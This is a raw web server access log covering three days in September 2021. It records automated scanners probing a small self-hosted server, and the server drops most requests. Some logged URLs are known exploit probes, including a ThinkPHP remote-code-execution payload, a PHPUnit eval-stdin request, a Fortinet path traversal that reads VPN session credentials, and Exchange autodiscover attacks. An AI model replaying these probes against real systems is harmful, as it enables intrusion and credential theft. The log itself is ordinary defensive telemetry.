"/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:37 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:39 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:39 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:40 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:40 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [04/Sep/2021:00:00:42 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:43 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:45 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:00:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:00:03:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [04/Sep/2021:01:16:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.206.128.6] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [04/Sep/2021:01:59:11 +0000] 444 - GET https mosquitto.moralanimal.net "/wp/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [04/Sep/2021:02:36:33 +0000] 400 - GET http localhost "/recordings/theme/main.css" [Client 77.247.108.42] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [04/Sep/2021:02:45:56 +0000] 444 - GET https mosquitto.moralanimal.net "/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [04/Sep/2021:02:47:59 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 186.4.132.71] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [04/Sep/2021:03:02:03 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [04/Sep/2021:03:02:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [04/Sep/2021:03:33:54 +0000] 444 - GET https mosquitto.moralanimal.net "/site/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [04/Sep/2021:04:04:11 +0000] 444 - GET https mosquitto.moralanimal.net "/news/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [04/Sep/2021:04:24:12 +0000] 444 - GET https mosquitto.moralanimal.net "/en/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [04/Sep/2021:05:39:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.230] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Sep/2021:06:37:33 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [04/Sep/2021:08:04:57 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [04/Sep/2021:08:58:45 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [04/Sep/2021:09:54:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.64.98] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [04/Sep/2021:10:36:32 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.210.107] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Sep/2021:13:08:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.58] [Length 0] [Gzip -] "-" "-" [04/Sep/2021:13:08:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "-" "-" [04/Sep/2021:13:08:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [04/Sep/2021:13:54:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.42] [Length 0] [Gzip -] "-" "-" [04/Sep/2021:13:54:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "-" "-" [04/Sep/2021:13:54:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [04/Sep/2021:16:15:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:19 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:22 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:23 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:23 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:24 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:25 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [04/Sep/2021:16:15:27 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:27 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:28 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:30 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:15:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Sep/2021:16:41:42 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 45.42.44.233] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [04/Sep/2021:16:52:45 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [04/Sep/2021:16:58:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.193] [Length 0] [Gzip -] "-" "-" [04/Sep/2021:16:58:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "-" "-" [04/Sep/2021:16:58:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [04/Sep/2021:17:47:36 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 252] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" [04/Sep/2021:17:47:36 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 252] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" [04/Sep/2021:17:47:37 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [04/Sep/2021:21:33:29 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.217.53] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Sep/2021:22:53:12 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Sep/2021:22:53:12 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Sep/2021:22:53:12 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Sep/2021:22:53:12 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Sep/2021:22:53:12 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Sep/2021:22:53:12 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Sep/2021:23:17:52 +0000] 444 - GET https router.moralanimal.net "/" [Client 61.135.15.137] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; LG G2 Build/170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [04/Sep/2021:23:27:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.167] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Sep/2021:00:17:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.68] [Length 0] [Gzip -] "-" "-" [05/Sep/2021:00:37:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.151] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Sep/2021:05:28:55 +0000] 400 - - http localhost "-" [Client 78.128.112.18] [Length 154] [Gzip -] "-" "-" [05/Sep/2021:06:12:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.181] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Sep/2021:07:32:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Sep/2021:07:41:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 212.102.35.21] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "-" [05/Sep/2021:09:11:58 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.1] [Length 0] [Gzip -] "Go http package" "-" [05/Sep/2021:09:28:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Sep/2021:10:36:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.107.70.202] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [05/Sep/2021:10:36:47 +0000] 444 - OPTIONS https localhost "/" [Client 66.230.230.230] [Length 0] [Gzip -] "-" "-" [05/Sep/2021:10:36:48 +0000] 400 - - https localhost "-" [Client 23.129.64.146] [Length 154] [Gzip -] "-" "-" [05/Sep/2021:10:36:50 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 66.230.230.230] [Length 0] [Gzip -] "-" "-" [05/Sep/2021:10:37:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.101] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Sep/2021:11:45:46 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:46 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:50 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:50 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [05/Sep/2021:11:45:51 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:52 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:53 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:54 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:54 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:11:45:56 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Sep/2021:16:05:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Sep/2021:17:01:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Sep/2021:19:45:50 +0000] 400 - HEAD http localhost "/" [Client 143.110.219.31] [Length 0] [Gzip -] "-" "-" [05/Sep/2021:19:45:50 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 143.110.219.31] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:50 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 143.110.219.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:50 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 143.110.219.31] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:50 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 143.110.219.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:50 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 143.110.219.31] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:51 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 143.110.219.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:51 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 143.110.219.31] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:51 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 143.110.219.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:51 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 143.110.219.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [05/Sep/2021:19:45:51 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 143.110.219.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [05/Sep/2021:19:45:51 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 143.110.219.31] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:19:45:51 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 143.110.219.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Sep/2021:21:14:39 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.220.39] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Sep/2021:21:41:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Sep/2021:22:19:43 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 62.210.148.221] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1" "-" [05/Sep/2021:23:01:19 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.233] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Sep/2021:23:29:09 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Sep/2021:00:10:07 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.217.246] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Sep/2021:00:47:55 +0000] 400 - GET http localhost "/" [Client 138.68.128.169] [Length 252] [Gzip -] "-" "-" [06/Sep/2021:01:14:42 +0000] 444 - 